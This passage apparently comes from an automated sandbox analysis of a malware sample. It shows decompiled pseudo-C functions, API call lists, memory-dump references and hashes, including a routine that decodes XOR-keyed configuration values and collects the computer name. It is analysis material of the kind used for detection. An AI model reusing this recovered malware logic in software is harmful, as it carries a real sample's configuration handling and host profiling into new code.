					goto L7;
				}
				_t25 = RtlAllocateHeap(); // executed
				if(_t25 == 0) {
					goto L6;
				}
				_t24 = E04674AB6(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}












                                                          0x0467a376
                                                          0x0467a376
                                                          0x0467a379
                                                          0x0467a37a
                                                          0x0467a384
                                                          0x0467a38b
                                                          0x0467a390
                                                          0x0467a392
                                                          0x0467a398
                                                          0x0467a3c0
                                                          0x0467a3d8
                                                          0x0467a3da
                                                          0x0467a3db
                                                          0x0467a3dd
                                                          0x0467a41b
                                                          0x0467a41b
                                                          0x0467a421
                                                          0x0467a427
                                                          0x0467a427
                                                          0x0467a3df
                                                          0x0467a3e5
                                                          0x0467a3e8
                                                          0x0467a3f7
                                                          0x0467a3f9
                                                          0x0467a400
                                                          0x0467a434
                                                          0x0467a439
                                                          0x0467a43b
                                                          0x0467a43d
                                                          0x0467a43d
                                                          0x00000000
                                                          0x0467a43b
                                                          0x0467a402
                                                          0x0467a407
                                                          0x0467a415
                                                          0x00000000
                                                          0x0467a415
                                                          0x0467a3cf
                                                          0x0467a3d4
                                                          0x0467a3d4
                                                          0x00000000
                                                          0x0467a3d4
                                                          0x0467a39a
                                                          0x0467a3a2
                                                          0x00000000
                                                          0x00000000
                                                          0x0467a3b1
                                                          0x00000000

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0467A39A
                                                            • Part of subcall function 04674AB6: GetTickCount.KERNEL32 ref: 04674ACA
                                                            • Part of subcall function 04674AB6: wsprintfA.USER32 ref: 04674B1A
                                                            • Part of subcall function 04674AB6: wsprintfA.USER32 ref: 04674B37
                                                            • Part of subcall function 04674AB6: wsprintfA.USER32 ref: 04674B63
                                                            • Part of subcall function 04674AB6: HeapFree.KERNEL32(00000000,?), ref: 04674B75
                                                            • Part of subcall function 04674AB6: wsprintfA.USER32 ref: 04674B96
                                                            • Part of subcall function 04674AB6: HeapFree.KERNEL32(00000000,?), ref: 04674BA6
                                                            • Part of subcall function 04674AB6: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04674BD4
                                                            • Part of subcall function 04674AB6: GetTickCount.KERNEL32 ref: 04674BE5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 0467A3B8
                                                          • RtlFreeHeap.NTDLL(00000000,00000002,04675289,?,04675289,00000002,?,?,04675D5E,?), ref: 0467A415
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                          • String ID:
                                                          • API String ID: 1676223858-0
                                                          • Opcode ID: a073f00c08e448570e193d837648014d181b1c84bb0b12fc56559f0de5dfd7a9
                                                          • Instruction ID: 609fbd67a5f7ae127d510c0ebaf5166dd896ceae1fb54129f38b04b143899883
                                                          • Opcode Fuzzy Hash: a073f00c08e448570e193d837648014d181b1c84bb0b12fc56559f0de5dfd7a9
                                                          • Instruction Fuzzy Hash: 40213772210204EBEB15DF98D884AAE37ACEF49355F10442AFA01DB250FB75AD42DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467219B, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E0467219B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t76 = E04673AB0(_v8, _a8, _a12, _a20,  &_a20,  &_a12);
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x467d2a8; // 0x47a5a8
						_t20 = _t68 + 0x467e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E046757B4(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}




















                                                          0x046721a1
                                                          0x046721a4
                                                          0x046721b4
                                                          0x046721bd
                                                          0x046721c1
                                                          0x0467228f
                                                          0x04672295
                                                          0x04672295
                                                          0x046721e0
                                                          0x046721e4
                                                          0x046721ea
                                                          0x046721ef
                                                          0x046721f6
                                                          0x04672205
                                                          0x04672205
                                                          0x04672209
                                                          0x0467220b
                                                          0x04672217
                                                          0x04672222
                                                          0x0467222d
                                                          0x04672231
                                                          0x0467223b
                                                          0x0467223f
                                                          0x04672241
                                                          0x04672246
                                                          0x0467224d
                                                          0x0467225d
                                                          0x0467225d
                                                          0x04672246
                                                          0x0467223f
                                                          0x0467225f
                                                          0x04672264
                                                          0x04672269
                                                          0x04672269
                                                          0x0467226c
                                                          0x04672275
                                                          0x0467227a
                                                          0x0467227a
                                                          0x0467227f
                                                          0x04672284
                                                          0x04672284
                                                          0x0467227f
                                                          0x04672209
                                                          0x04672286
                                                          0x0467228c
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 04673AB0: SysAllocString.OLEAUT32(80000002), ref: 04673B0D
                                                            • Part of subcall function 04673AB0: SysFreeString.OLEAUT32(00000000), ref: 04673B73
                                                          • SysFreeString.OLEAUT32(?), ref: 0467227A
                                                          • SysFreeString.OLEAUT32(046785ED), ref: 04672284
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: 7cf4b60f59618ef84ab7b7b0eeadd578464ec55b1c92959f8b6434592396d285
                                                          • Instruction ID: 819cb0cdd6e32687ad38f6651ba1c8b3786c00ac4e31cff97654c27a0625b75e
                                                          • Opcode Fuzzy Hash: 7cf4b60f59618ef84ab7b7b0eeadd578464ec55b1c92959f8b6434592396d285
                                                          • Instruction Fuzzy Hash: E2317E71500119EFCB11EF94C898CABBB7AFFC97407104A98F9259B214E731ED91CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04676207, Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(0467A513), ref: 04676220
                                                            • Part of subcall function 0467219B: SysFreeString.OLEAUT32(?), ref: 0467227A
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04676261
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 986138563-0
                                                          • Opcode ID: c2a579feade5bcd7cc1ab4296f9c0a7ab03141935f18a32e33404ebf89274135
                                                          • Instruction ID: fa11c161ef593caaf193bc90d1be66d9a1873cd98ad24048395cef67c12e7520
                                                          • Opcode Fuzzy Hash: c2a579feade5bcd7cc1ab4296f9c0a7ab03141935f18a32e33404ebf89274135
                                                          • Instruction Fuzzy Hash: C5014B3651010ABFDB419FA8D804DAB7BB9EF48614B104066FA08E6220F6319E158BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046758DB, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E046758DB(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E0467A71F(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E0467A734(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                                                          0x046758e0
                                                          0x046758eb
                                                          0x046758ed
                                                          0x046758f3
                                                          0x046758f5
                                                          0x046758fa
                                                          0x04675903
                                                          0x04675907
                                                          0x04675910
                                                          0x04675914
                                                          0x04675923
                                                          0x04675916
                                                          0x04675917
                                                          0x0467591c
                                                          0x0467591c
                                                          0x04675914
                                                          0x04675907
                                                          0x0467592c

                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04671FA0,74B5F710,00000000,?,?,04671FA0), ref: 046758F3
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04671FA0,04671FA1,?,?,04671FA0), ref: 04675910
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 8255951fb48d604882ac42a78608785b9ca83fac7b90c8c45ff71104775bf486
                                                          • Instruction ID: dec8fcf8da11312fd6ad08181bb7f754831d400e81df9f130ce832c22fd26c9a
                                                          • Opcode Fuzzy Hash: 8255951fb48d604882ac42a78608785b9ca83fac7b90c8c45ff71104775bf486
                                                          • Instruction Fuzzy Hash: 93F05436600145BAEB11D7A98C01EAF76FDDBC5654F250099A505E3241FA70EE019770
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04674ECA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x467d23c) == 0) {
						E04671B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x467d23c) == 1) {
						_t10 = E046712E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                          0x04674ed1
                                                          0x04674ed2
                                                          0x04674ed5
                                                          0x04674f07
                                                          0x04674f09
                                                          0x04674f09
                                                          0x04674ed7
                                                          0x04674ed8
                                                          0x04674eed
                                                          0x04674ef4
                                                          0x04674ef6
                                                          0x04674ef6
                                                          0x04674ef4
                                                          0x04674ed8
                                                          0x04674f11

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0467D23C), ref: 04674EDF
                                                            • Part of subcall function 046712E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04674EF2,?), ref: 046712F8
                                                          • InterlockedDecrement.KERNEL32(0467D23C), ref: 04674EFF
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 4c85086cc923fa27e6a7e17f275a843983c6fcf07f83d13222bb9ea54d5d0aaf
                                                          • Instruction ID: db1629f6511a3e3dda3e1bb1079db6b3b9df5bc9dc510c86ff5e49150eb5f10f
                                                          • Opcode Fuzzy Hash: 4c85086cc923fa27e6a7e17f275a843983c6fcf07f83d13222bb9ea54d5d0aaf
                                                          • Instruction Fuzzy Hash: C9E0863132813953E7211EB4990CB5EA652EFD1B84F014415F681D1230FE18F84196D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04671AE2, Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E04671AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}








                                                          0x04671ae2
                                                          0x04671aef
                                                          0x04671af0
                                                          0x04671af1
                                                          0x04671af8
                                                          0x04671b26
                                                          0x04671b27
                                                          0x04671b2a
                                                          0x04671b30
                                                          0x00000000
                                                          0x00000000
                                                          0x04671b0f
                                                          0x04671b19
                                                          0x04671b20
                                                          0x00000000
                                                          0x04671b11
                                                          0x04671b14
                                                          0x04671b34
                                                          0x04671b16
                                                          0x04671b16
                                                          0x00000000
                                                          0x04671b16
                                                          0x04671b14
                                                          0x04671b3b
                                                          0x04671b41
                                                          0x04671b41
                                                          0x00000000

                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 04671B2A
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 70b506ef5b7b124e7ad1a5f0a3943d7f174ebc93e8d47d25ecf82941f30abf6e
                                                          • Instruction ID: 49c126267fd43f697d1763ab61a96d3a0c032c432fcab0302e3f64acc40db80b
                                                          • Opcode Fuzzy Hash: 70b506ef5b7b124e7ad1a5f0a3943d7f174ebc93e8d47d25ecf82941f30abf6e
                                                          • Instruction Fuzzy Hash: 71F0E775D01218EFDB00DBA4C988AEDB7B8EF19705F1480ABE502A7240F7B46B85DF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04675D7D, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04675D7D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04676002(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E04676207(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                                          0x04675d85
                                                          0x04675d9f
                                                          0x00000000
                                                          0x04675dbb
                                                          0x04675d96
                                                          0x04675d9d
                                                          0x00000000
                                                          0x00000000
                                                          0x04675dc2

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,04678708,3D0467C0,80000002,04673741,0467A513,74666F53,4D4C4B48,0467A513,?,3D0467C0,80000002,04673741,?), ref: 04675DA2
                                                            • Part of subcall function 04676207: SysAllocString.OLEAUT32(0467A513), ref: 04676220
                                                            • Part of subcall function 04676207: SysFreeString.OLEAUT32(00000000), ref: 04676261
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFreelstrlen
                                                          • String ID:
                                                          • API String ID: 3808004451-0
                                                          • Opcode ID: 0ed66d8c4b81ecde1b5c536fa63320eb16a2675bdf9ba008f4c8f3cb9191c341
                                                          • Instruction ID: 15fb57c5197554bf319a43dbe6a18f0b6c8fa186a74ae8717011a093f43f007c
                                                          • Opcode Fuzzy Hash: 0ed66d8c4b81ecde1b5c536fa63320eb16a2675bdf9ba008f4c8f3cb9191c341
                                                          • Instruction Fuzzy Hash: 6CF02B7201020EBFDF169F94DD0AEEA3F6AEB18354F048019FA1554161E772E9B1EBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0467888E, Relevance: 10.7, APIs: 7, Instructions: 237memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E0467888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x467d2a4; // 0x63699bc3
				if(E04677145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x467d2d8 = _v8;
				}
				_t31 =  *0x467d2a4; // 0x63699bc3
				if(E04677145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x467d2a4; // 0x63699bc3
				if(E04677145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x467d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x467d2a4; // 0x63699bc3
						_t43 = E04676B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x467d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x467d2a4; // 0x63699bc3
						_t44 = E04676B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x467d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x467d2a4; // 0x63699bc3
						_t45 = E04676B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x467d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x467d2a4; // 0x63699bc3
						_t46 = E04676B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x467d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x467d2a4; // 0x63699bc3
						_t47 = E04676B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x467d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x467d2a4; // 0x63699bc3
						_t48 = E04676B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E046756FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E04676702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x467d2a4; // 0x63699bc3
						_t49 = E04676B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E046756FA(0, _t49) != 0) {
						_t114 =  *0x467d32c; // 0x4af95b0
						E046723F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x467d2a4; // 0x63699bc3
						_t50 = E04676B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x467d2a8; // 0x47a5a8
						_t20 = _t51 + 0x467e252; // 0x616d692f
						 *0x467d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E046756FA(0, _t50);
						 *0x467d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x467d2a4; // 0x63699bc3
								_t53 = E04676B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x467d2a8; // 0x47a5a8
								_t21 = _t54 + 0x467e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E046756FA(0, _t53);
							}
							 *0x467d340 = _t55;
							HeapFree( *0x467d238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}




































                                                          0x0467888e
                                                          0x04678891
                                                          0x046788b1
                                                          0x046788bf
                                                          0x046788bf
                                                          0x046788c4
                                                          0x046788de
                                                          0x04678b0d
                                                          0x04678b14
                                                          0x04678b1b
                                                          0x04678b1b
                                                          0x046788e4
                                                          0x04678900
                                                          0x04678afb
                                                          0x04678b05
                                                          0x00000000
                                                          0x04678906
                                                          0x04678906
                                                          0x0467890b
                                                          0x04678921
                                                          0x0467890d
                                                          0x0467890d
                                                          0x0467891a
                                                          0x0467891a
                                                          0x0467892b
                                                          0x0467892d
                                                          0x04678937
                                                          0x0467893c
                                                          0x0467893c
                                                          0x04678937
                                                          0x04678943
                                                          0x04678959
                                                          0x04678945
                                                          0x04678945
                                                          0x04678952
                                                          0x04678952
                                                          0x0467895d
                                                          0x0467895f
                                                          0x04678969
                                                          0x0467896e
                                                          0x0467896e
                                                          0x04678969
                                                          0x04678975
                                                          0x0467898b
                                                          0x04678977
                                                          0x04678977
                                                          0x04678984
                                                          0x04678984
                                                          0x0467898f
                                                          0x04678991
                                                          0x0467899b
                                                          0x046789a0
                                                          0x046789a0
                                                          0x0467899b
                                                          0x046789a7
                                                          0x046789bd
                                                          0x046789a9
                                                          0x046789a9
                                                          0x046789b6
                                                          0x046789b6
                                                          0x046789c1
                                                          0x046789c3
                                                          0x046789cd
                                                          0x046789d2
                                                          0x046789d2
                                                          0x046789cd
                                                          0x046789d9
                                                          0x046789ef
                                                          0x046789db
                                                          0x046789db
                                                          0x046789e8
                                                          0x046789e8
                                                          0x046789f3
                                                          0x046789f5
                                                          0x046789ff
                                                          0x04678a04
                                                          0x04678a04
                                                          0x046789ff
                                                          0x04678a0b
                                                          0x04678a21
                                                          0x04678a0d
                                                          0x04678a0d
                                                          0x04678a1a
                                                          0x04678a1a
                                                          0x04678a25
                                                          0x04678a27
                                                          0x04678a2a
                                                          0x04678a2b
                                                          0x04678a32
                                                          0x04678a34
                                                          0x04678a35
                                                          0x04678a35
                                                          0x04678a32
                                                          0x04678a3c
                                                          0x04678a52
                                                          0x04678a3e
                                                          0x04678a3e
                                                          0x04678a4b
                                                          0x04678a4b
                                                          0x04678a56
                                                          0x04678a64
                                                          0x04678a6e
                                                          0x04678a6e
                                                          0x04678a75
                                                          0x04678a8b
                                                          0x04678a77
                                                          0x04678a77
                                                          0x04678a84
                                                          0x04678a84
                                                          0x04678a8f
                                                          0x04678aa2
                                                          0x04678aa2
                                                          0x04678aa7
                                                          0x04678aad
                                                          0x00000000
                                                          0x04678a91
                                                          0x04678a94
                                                          0x04678a99
                                                          0x04678aa0
                                                          0x04678ab2
                                                          0x04678ab4
                                                          0x04678aca
                                                          0x04678ab6
                                                          0x04678ab6
                                                          0x04678ac3
                                                          0x04678ac3
                                                          0x04678ace
                                                          0x04678ada
                                                          0x04678adf
                                                          0x04678adf
                                                          0x04678ad0
                                                          0x04678ad3
                                                          0x04678ad3
                                                          0x04678aed
                                                          0x04678af2
                                                          0x04678af8
                                                          0x00000000
                                                          0x04678af8
                                                          0x00000000
                                                          0x04678aa0
                                                          0x04678a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 04678933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 04678965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 04678997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 046789C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 046789FB
                                                          • HeapFree.KERNEL32(00000000,04675D25,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008,?,04675D25), ref: 04678AF2
                                                          • HeapFree.KERNEL32(00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008,?,04675D25), ref: 04678B05
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
